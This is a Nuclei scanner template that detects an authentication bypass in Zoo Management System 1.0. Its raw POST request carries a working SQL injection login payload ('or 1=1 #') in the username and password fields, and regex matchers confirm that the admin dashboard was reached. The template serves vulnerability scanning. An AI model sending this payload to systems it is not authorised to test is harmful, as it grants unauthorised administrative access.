nuclei-templates/vulnerabilities/other/zms-auth-bypass.yaml

39 lines
1.1 KiB
YAML

id: zms-auth-bypass
info:
name: Zoo Management System 1.0 - Authentication Bypass
author: dwisiswant0
severity: high
refernce: https://www.exploit-db.com/exploits/48880
requests:
- raw:
- |
POST /zms/admin/index.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Origin: http://{{Hostname}}
Connection: close
Referer: http://{{Hostname}}/zms/admin/index.php
Cookie: PHPSESSID=s22oss00i0ob4hcnsgkobb9r7p
Upgrade-Insecure-Requests: 1
username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: regex
regex:
- "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)"
- "ZMS ADMIN"
condition: and
part: body
- type: status
status:
- 200